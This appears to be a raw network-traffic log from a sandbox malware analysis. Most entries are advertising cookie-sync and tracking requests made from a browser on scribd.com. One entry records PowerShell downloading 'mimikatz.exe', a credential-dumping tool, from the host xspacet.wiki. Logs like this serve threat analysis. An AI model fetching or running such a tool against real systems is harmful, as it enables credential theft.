XANDR_PANID=yoDWIi40QA0l92CMfnRGTVK6j8ph7xMEE2hovwWpxM3jlu8-JszEEuNouxtI9R3D-QUOCwsGww6GCGm89qzRlyyUz_8TuJUoh7BvVk-kenM.; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /cksync?gdpr=0&gdpr_consent=&cs=34&type=pri&ovsid=67b433ed2421e&redirect=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D127%26advUuid%3D%3Cvsid%3E%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: cs.media.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D121%26advUuid%3D%24UID HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: tluidp=1275989254868253457531
Source: global trafficHTTP traffic detected: GET /pubsync?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D126%26advUuid%3D%5Btvid%5D HTTP/1.1Host: mb9eo.publishers.tremorhub.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=6ca034eb-2728-4fa9-b456-793a6491b4b3%252Chttps%25253A%25252F%25252Fids.ad.gt%25252Fapi%25252Fv1%25252Ftapad_match%25253Fid%25253DAU1D-0100-001739863021-EHT1L4CA-5M76%252526tapad_id%25253D6ca034eb-2728-4fa9-b456-793a6491b4b3%252C&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /iu3?cm3ppd=1&d=dtb-pub&csif=t&dl=n-mediagrid_n-index_rx_n-acuityads_n-MediaNet_ox-db5_n-colossusMedia_n-cadent_n-adman-v2_n-onetag_pm-db5_n-simpli.fi_ym_n-vmg_n-nativo_sovrn_gg_n-adMediaV1_n-Ogury_n-Beeswax_smrt_n-inmobi_cnv_n-Seedtag_rbd_ppt_an-db5_n-Rise_3lift HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ups/58818/sync?redir=true&gdpr=0&gdpr_consent=&verify=true HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D130%26advUuid%3D%24UID HTTP/1.1Host: ap.lijit.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /assets/bt-rlink-storage-OAPAZjOc.html HTTP/1.1Host: cdn.btmessage.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /user-matching?id=3586&gdpr=0&gdpr_consent= HTTP/1.1Host: ads.stickyadstv.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pubsync/verify?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D126%26advUuid%3D%5Btvid%5D HTTP/1.1Host: mb9eo.publishers.tremorhub.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /profiles_engine/ProfilesEngineServlet?at=20&mi=10&dpi=793790479&3rddpi=1486637409&3rdpcid=35b1ff19-ce3f-4652-8688-79bcb2c9acd3 HTTP/1.1Host: sync.intentiq.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: intentIQ=0t75g7C0hX; IQver=1.9; ASDT=0; IQMID=137264061#1739863024423; intentIQCDate=1739863024422; CSDT=UEQ6MTUxMDZfMCZVZDhad2ha; IQPData=137264061#1739863025789#0#1739863024420
Source: global trafficHTTP traffic detected: GET /api/sync?callerId=21&redirectUri=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D140%26advUuid%3D%5Bssb_sync_pid%5D%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ssbsync-global.smartadserver.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bh/rtset?ev=1&gdpr=0&gdpr_consent=&pid=562615&rurl=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11592%26uid%3D%25%25VGUID%25%25&us_privacy=%5BUS_PRIVACY%5D HTTP/1.1Host: bh.contextweb.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usync/?gdpr=0&gdpr_consent=&pubId=69f48c2160c8113 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /oRTB?gdpr=0&gdpr_consent=&redirect=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11595%26id%3D%7BID5UID%7D HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /stein/mimikatz.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: xspacet.wikiConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /universal/v1?supply_id=Wog2sp89&gdpr=0&gdpr_consent= HTTP/1.1Host: match.sharethrough.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/user/pixel/?redirect=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D151%26advUuid%3D%24%7BuserId%7D%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: sync.kueezrtb.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /iu3?cm3ppd=1&d=dtb-pub&csif=t&dl=n-mediagrid_n-index_rx_n-acuityads_n-MediaNet_ox-db5_n-colossusMedia_n-cadent_n-adman-v2_n-onetag_pm-db5_n-simpli.fi_ym_n-vmg_n-nativo_sovrn_gg_n-adMediaV1_n-Ogury_n-Beeswax_smrt_n-inmobi_cnv_n-Seedtag_rbd_ppt_an-db5_n-Rise_3lift&dcc=t HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /?gdpr=0&gdpr_consent=&us_privacy=&r=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D154%26advUuid%3D%24UID%26gdpr%3D0%26gdpr_consent%3D%26us_privacy%3D HTTP/1.1Host: sync.ingage.techConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /w/1.0/cm?gdpr=0&gdpr_consent=&id=58ceaaf5-c766-4c17-869a-d76e43401714&r=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11563%26id%3D HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /universal/v1?gdpr=0&gdpr_consent=&supply_id=5926d422 HTTP/1.1Host: match.sharethrough.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /us?consent_string=&gdpr=0&loc=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D115667%26uid%3D%5BUID%5D HTTP/1.1Host: sync.go.sonobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /utils/xapi/multi-sync.html?endpoint=us-east&p=rise_engage HTTP/1.1Host: secure-assets.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /ps/?ri=0015a00002hdV5tAAE&ru=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11580%26puid%3D33XUSERID33X HTTP/1.1Host: ssc-cms.33across.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=primis&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.1rx.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cookie?redirect_url=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D143%26advUuid%3D%24UID%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: cm.adform.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11607%26uid%3D%24UID HTTP/1.1Host: ap.lijit.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?gdpr=%5BGDPR%5D&gdpr_consent=%5BUSER_CONSENT%5D&sub=typeaholdings HTTP/1.1Host: sync.1rx.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /uploads/cn1/video/users/converted/29874/video_65ba1ab406070534415698/vid6793665ef0992447929939.jpg?cbuster=1737713253 HTTP/1.1Host: video.primis.techConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: csuuid=67b433ed2421e
Source: global trafficHTTP traffic detected: GET /?gdpr=0&gdpr_consent=&pubid=11362&redirect=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11571%26id%3D%7Bdevice_id%7D HTTP/1.1Host: csync.loopme.meConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: viewer_token=88d7ae9b-757d-4195-ad7d-f0171149038f
